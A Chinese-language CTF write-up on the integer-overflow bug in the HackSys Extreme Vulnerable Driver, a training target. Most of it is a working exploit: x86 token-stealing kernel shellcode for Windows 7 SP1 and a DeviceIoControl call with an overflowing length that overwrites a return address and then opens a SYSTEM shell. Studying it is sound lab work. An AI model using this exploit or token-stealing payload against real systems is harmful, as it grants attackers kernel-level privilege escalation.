整數溢出在 CTF 的 pwn 裏面很常見。
這東西確實，怎麼說呢，道理就很淺顯。
整數的範圍就那麼大，如果超過了就可能造成漏洞。
先來看一下 HEVD 的源碼。
可以看到危險版本和安全版本的區別。
其中 TerminatorSize 賦值的地方，這裏就是 4。那麼如果我們的值是 0xfffffffc~0xffffffff，加上 4 之後就溢出為 0~3，
於是就繞過了檢查。
exp 的話就很簡單了。
然後我這裏的 ebp 距離和上面 exp 的有所不同，用 IDA 可以看得出來。
成功執行 shellcode，並且成功拿到權限。
這裏是繞過檢查的 exp：
#include<stdio.h>
#include<string.h>
#include<algorithm>
#include<vector>
#include<iostream>
#include<time.h>
#include "windows.h"
using namespace std;
// Not referenced anywhere in this listing as shown: shellcode's address is
// cast straight to DWORD below rather than going through this type.
typedef void(*FunctionPointer) ();
// Kernel-mode payload for the HEVD integer-overflow case.
// Build note: MSVC `__asm` blocks are only available in 32-bit builds, so this
// function (and the DWORD pointer cast in main) is x86-only.
// Every structure offset below (0x124, 0x50, 0xb8, 0xb4, 0xf8) belongs to the
// Windows 7 SP1 x86 layout named in the per-line comments; on any other build
// they would have to be re-derived, so treat them as version-specific data,
// not as stable constants.
// The "Kernel Recovery Stub" at the end must match the driver's stack frame at
// the point the return address was overwritten; the write-up notes that this
// ebp distance differs between machines and was confirmed in IDA.
VOID shellcode() {
__asm {
pushad; Save registers state
; Start of Token Stealing Stub
xor eax, eax; Set ZERO
mov eax, fs:[eax + 124h]; Get nt!_KPCR.PcrbData.CurrentThread
; _KTHREAD is located at FS : [0x124]
mov eax, [eax + 050h]; Get nt!_KTHREAD.ApcState.Process
mov ecx, eax; Copy current process _EPROCESS structure
mov edx, 4; WIN 7 SP1 SYSTEM process PID = 0x4
SearchSystemPID:
mov eax, [eax + 0b8h]; Get nt!_EPROCESS.ActiveProcessLinks.Flink
sub eax, 0b8h; Back from the list entry to the start of _EPROCESS
cmp[eax + 0b4h], edx; Compare nt!_EPROCESS.UniqueProcessId with edx (4)
jne SearchSystemPID
mov edx, [eax + 0f8h]; Get SYSTEM process nt!_EPROCESS.Token
mov[ecx + 0f8h], edx; Replace target process nt!_EPROCESS.Token
; with SYSTEM process nt!_EPROCESS.Token
; End of Token Stealing Stub
popad; Restore registers state
; Kernel Recovery Stub -- frame-specific, see header comment
xor eax, eax; Set NTSTATUS SUCCESS
add esp, 12; Fix the stack
pop ebp; Restore saved EBP
ret 8; Return cleanly
}
}
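// Launch cmd.exe in a new console window.
// No return value; a failed CreateProcessW is silently ignored, exactly as in
// the original. The only changes are type consistency and handle hygiene.
static VOID Cmd()
{
    // Use the W structure to match CreateProcessW. The original declared a
    // STARTUPINFO (the A variant in a non-UNICODE build) and cast it to
    // LPSTARTUPINFOW; that only works because the two structs share a layout.
    STARTUPINFOW si = { sizeof(si) };
    PROCESS_INFORMATION pi = { 0 };
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOW;
    // lpCommandLine must be a writable buffer: CreateProcessW may modify it.
    WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
    BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE,
                                  CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
    if (bReturn) {
        // The child keeps running; we just drop our references to it.
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
}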
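// Constants lifted verbatim from the original listing; the names are local to
// this file and do not claim to be the driver's own identifiers.
static const char   kDevicePath[]  = "\\\\.\\HackSysExtremeVulnerableDriver";
static const DWORD  kIoctlCode     = 0x222027;   // control code used by the listing
static const SIZE_T kBufferSize    = 0x830;
static const SIZE_T kRetAddrOffset = 0x824;      // slot the listing fills with &shellcode
static const SIZE_T kTailOffset    = 0x828;
static const DWORD  kTailValue     = 0xBAD0B0B0;

// Entry point. Opens the HEVD device, issues one DeviceIoControl whose input
// length is 0xFFFFFFFF (the value the write-up describes as wrapping past the
// TerminatorSize check), then spawns cmd.exe via Cmd().
// Returns 0 on the normal path; calls exit(EXIT_FAILURE) if the device cannot
// be opened or an SEH exception is raised.
// Changes from the original: the device handle is closed instead of leaked,
// a failed DeviceIoControl is reported, and the magic numbers are named.
int main()
{
    CHAR buffer[kBufferSize];
    HANDLE hDevice = NULL;
    DWORD bytesReturned = 0;
    __try
    {
        hDevice = CreateFileA(kDevicePath,
                              GENERIC_READ | GENERIC_WRITE,
                              FILE_SHARE_READ | FILE_SHARE_WRITE,
                              NULL,
                              OPEN_EXISTING,
                              FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED,
                              NULL);
        if (hDevice == INVALID_HANDLE_VALUE || hDevice == NULL) {
            printf("\t\t[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }
        memset(buffer, 'A', kBufferSize);
        // x86-only: casting a function pointer to DWORD would truncate on a
        // 64-bit build (where the __asm payload does not compile anyway).
        *(PDWORD)(buffer + kRetAddrOffset) = (DWORD)&shellcode;
        *(PDWORD)(buffer + kTailOffset) = kTailValue;
        // nInBufferSize is deliberately 0xFFFFFFFF; this is the integer
        // overflow the write-up is about.
        BOOL ok = DeviceIoControl(hDevice,
                                  kIoctlCode,
                                  (LPVOID)buffer,
                                  (DWORD)0xFFFFFFFF,
                                  NULL,
                                  0,
                                  &bytesReturned,
                                  NULL);
        if (!ok) {
            // Report only; the original proceeded to Cmd() regardless, and so do we.
            printf("\t\t[-] DeviceIoControl failed: 0x%X\n", GetLastError());
        }
        CloseHandle(hDevice);   // the original never released this handle
        hDevice = NULL;
        Cmd();
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        printf("\t\t[-] Exception: 0x%X\n", GetLastError());
        exit(EXIT_FAILURE);
    }
    return 0;
}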